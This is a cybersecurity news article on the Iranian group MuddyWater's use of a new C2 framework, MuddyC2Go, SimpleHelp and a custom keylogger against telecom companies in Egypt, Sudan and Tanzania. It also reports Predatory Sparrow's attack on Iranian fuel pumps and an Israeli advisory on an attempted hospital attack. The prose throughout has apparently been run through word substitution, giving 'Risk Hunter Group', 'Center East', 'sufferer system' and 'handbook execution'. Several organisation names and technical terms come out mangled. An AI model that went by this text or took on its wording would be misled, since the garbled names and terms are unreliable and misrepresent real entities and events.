The Iranian nation-state actor referred to as MuddyWater has leveraged a newly found command-and-control (C2) framework referred to as MuddyC2Go in its assaults on the telecommunications sector in Egypt, Sudan, and Tanzania.
The Symantec Risk Hunter Group, a part of Broadcom, is monitoring the exercise underneath the title Seedworm, which can be tracked underneath the monikers Boggy Serpens, Cobalt Ulster, Earth Vetala, ITG17, Mango Sandstorm (previously Mercury), Static Kitten, TEMP.Zagros, and Yellow Nix.
Lively since at the least 2017, MuddyWater is assessed to be affiliated with Iran’s Ministry of Intelligence and Safety (MOIS), primarily singling out entities within the Center East.
The cyber espionage group’s use of MuddyC2Go was first highlighted by Deep Intuition final month, describing it as a Golang-based substitute for PhonyC2, itself a successor to MuddyC3. Nevertheless, there may be proof to recommend that it might have been employed as early as 2020.
From USER to ADMIN: Study How Hackers Achieve Full Management
Uncover the key ways hackers use to change into admins, how one can detect and block it earlier than it is too late. Register for our webinar at the moment.
Whereas the complete extent of MuddyC2Go’s capabilities is just not but identified, the executable comes fitted with a PowerShell script that robotically connects to Seedworm’s C2 server, thereby giving the attackers distant entry to a sufferer system and obviating the necessity for handbook execution by an operator.
The newest set of intrusions, which passed off in November 2023, have additionally been discovered to depend on SimpleHelp and Venom Proxy, alongside a customized keylogger and different publicly out there instruments.
Assault chains mounted by the group have a monitor file of weaponizing phishing emails and identified vulnerabilities in unpatched purposes for preliminary entry, adopted by conducting reconnaissance, lateral motion, and knowledge assortment.
Within the assaults documented by Symantec focusing on an unnamed telecommunications group, the MuddyC2Go launcher was executed to determine contact with an actor-controlled server, whereas additionally deploying reliable distant entry software program like AnyDesk and SimpleHelp.
The entity is alleged to have been beforehand compromised by the adversary earlier in 2023 by which SimpleHelp was used to launch PowerShell, ship proxy software program, and in addition set up the JumpCloud distant entry software.
“In one other telecommunications and media firm focused by the attackers, a number of incidents of SimpleHelp have been used to hook up with identified Seedworm infrastructure,” Symantec famous. “A customized construct of the Venom Proxy hacktool was additionally executed on this community, in addition to the brand new customized keylogger utilized by the attackers on this exercise.”
By using a mixture of bespoke, living-off-the-land, and publicly out there instruments in its assault chains, the objective is to evade detection for so long as attainable to satisfy its strategic aims, the corporate mentioned.
“The group continues to innovate and develop its toolset when required as a way to maintain its exercise underneath the radar,” Symantec concluded. “The group nonetheless makes heavy use of PowerShell and PowerShell-related instruments and scripts, underlining the necessity for organizations to pay attention to suspicious use of PowerShell on their networks.”
The event comes as an Israel-linked group referred to as Gonjeshke Darande (which means “Predatory Sparrow” in Persian) claimed duty for a cyber assault that disrupted a “majority of the fuel pumps all through Iran” in response to the “aggression of the Islamic Republic and its proxies within the area.”
The group, which reemerged in October 2023 after going quiet for practically a 12 months, is believed to be linked to the Israeli Army Intelligence Directorate, having performed harmful assaults in Iran, together with metal services, petrol stations, and rail networks within the nation.
The cyber assault additionally follows an advisory from the Israel Nationwide Cyber Directorate (INCD) that accused Iran and the pro-Hamas group Hezbollah of unsuccessfully making an attempt to disrupt Ziv Hospital, attributing the assault to risk actors named Agrius and Lebanese Cedar.
“The assault was executed by the Iranian Ministry of Intelligence with the involvement of Hezbollah’s ‘Lebanese Cedar’ cyber models underneath the management of Mohammad Ali Merhi,” the INCD mentioned.